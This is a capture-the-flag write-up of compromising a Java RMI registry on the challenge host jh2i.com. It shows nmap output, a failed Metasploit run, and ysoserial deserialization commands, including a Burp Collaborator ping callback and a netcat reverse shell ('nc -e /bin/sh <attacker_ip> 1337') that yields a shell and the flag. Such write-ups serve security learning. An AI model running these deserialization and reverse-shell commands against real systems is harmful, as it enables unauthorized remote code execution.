Tags: rmi ysoserial
Rating: 5.0
As the challange description says we can nmap this port.
```
Nmap scan report for jh2i.com (161.35.252.71)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
50028/tcp open java-rmi Java RMI
```
After some googling i tried this nmap script which showed vulnerable.
```
nmap -sV --script "rmi-vuln-classloader" -p 50028 jh2i.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 09:57 MSK
Nmap scan report for jh2i.com (161.35.252.71)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
50028/tcp open java-rmi Java RMI
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
| References:
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
```
There is a metasploit module to exploit this kind of configurations, but for unknown reason exploit failed (RMI did not fetch remote class from my url)
```
msf5 exploit(multi/misc/java_rmi_server) > run
[*] Started HTTP reverse handler on http://<attacker_ip>:13001
[*] 161.35.252.71:50028 - Using URL: http://<attacker_ip>:8080/4rAP7YrTVS4Ad
[*] 161.35.252.71:50028 - Server started.
[*] 161.35.252.71:50028 - Sending RMI Header...
[*] 161.35.252.71:50028 - Sending RMI Call...
[-] 161.35.252.71:50028 - Exploit failed: RuntimeError Exploit aborted due to failure unknown The RMI class loader couldnt find the payload
[*] 161.35.252.71:50028 - Server stopped.
[*] Exploit completed, but no session was created.
```
After that i googled more info about how RMI works and i discovered it uses java serealization. Thats when i downloaded fresh `ysoserial.jar` and started to play with it.
`ysoserial` has different payloads and cause i have no idea which classes are loaded on our target i went down a list. Most of payloads were crashing with an error:
```
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.lang.ClassNotFoundException: <class_name_from_ysoserial_payload>
```
However when i used this command the error was different:
`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028 Jdk7u21 'ping -c 1 8bkxpcnklb88m503jvyao24rui08ox.burpcollaborator.net'`
I went to check my collaborator window and it had DNS requests! That means we have blind code execution :)
![dns_requests](https://sun6-14.userapi.com/31FQUE5JPhK1qs21OfcwWf91M8zXhtgcq38bVg/_HPgL1IY-xk.jpg)
After that i tried some reverse shell payloads and luckily for me target had old `nc` which supported `-e` flag. So i fired next command:
`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028 Jdk7u21 'nc -e /bin/sh <attacker_ip> 1337'`
And on my box on port 1337 i got shell!
```
nc -lvnp 1337
listening on [any] 1337 ...
connect to [<attacker_ip>] from (UNKNOWN) [142.93.62.145] 48634
id
uid=1000(user) gid=1000(user) groups=1000(user)
ls
flag.txt
cat flag.txt
flag{why_is_my_roommate_so_serious}
```
Thanks for reading:)